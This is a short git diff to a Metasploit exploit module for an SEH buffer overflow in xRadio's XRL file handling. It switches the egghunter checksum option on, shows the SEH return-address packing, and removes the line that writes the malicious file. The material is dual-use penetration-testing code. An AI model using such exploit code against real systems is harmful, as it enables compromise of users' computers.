diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb index 8251a77d84..d769c9f811 100644 --- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb +++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb @@ -68,10 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - eggoptions = { - :checksum => false, + :checksum => true, :eggtag => 'w00t' } @@ -85,8 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote buffer << [target.ret].pack('V') # seh print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(buffer) - end + end